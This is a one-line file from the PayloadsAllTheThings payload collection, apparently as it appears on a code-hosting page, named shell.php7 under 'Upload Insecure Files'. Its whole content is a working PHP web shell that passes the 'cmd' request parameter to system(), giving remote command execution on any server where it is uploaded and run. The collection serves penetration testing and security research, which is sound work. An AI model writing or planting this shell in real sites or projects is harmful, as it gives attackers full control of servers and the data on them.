PayloadsAllTheThings/Upload Insecure Files/Extension PHP/shell.php7

1 line
43 B
Plaintext
Raw Normal View History

<?php echo "Shell";system($_GET['cmd']); ?>